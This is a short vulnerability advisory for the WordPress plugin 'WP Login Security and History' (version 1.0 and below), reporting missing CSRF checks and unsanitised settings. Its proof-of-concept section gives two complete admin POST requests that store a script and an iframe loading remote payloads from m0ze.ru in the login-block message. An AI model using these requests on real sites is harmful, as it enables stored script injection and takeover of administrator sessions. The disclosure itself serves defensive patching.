WP Login Security and History <= 1.0 - CSRF to Stored Cross-Site Scripting (XSS)

The plugin did not have CSRF check when saving its settings, not any sanitisation or validation on them. This could allow attackers to make logged in administrators change the plugin’s settings to arbitrary values, and set XSS payloads on them as well

PoC

– [ Payloads: ] [$] "> [$] "> ### – [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ] [!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page;_num=%22+onmouseover%3Dalert%28%29+1&tab;=2 HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 252 Cookie: [admin cookies] can_show_captcha_option=1&show;_captcha_count_option=1337&can;_block_login_trials=1&login;_max_trials=1337&login;_block_time=13&login;_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save;_Options=++Update+Options++ ### – [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ] [!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page;_num=%22+onmouseover%3Dalert%28%29+1&tab;=2 HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 258 Cookie: [admin cookies] can_show_captcha_option=1&show;_captcha_count_option=1337&can;_block_login_trials=1&login;_max_trials=1337&login;_block_time=13&login;_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save;_Options=++Update+Options++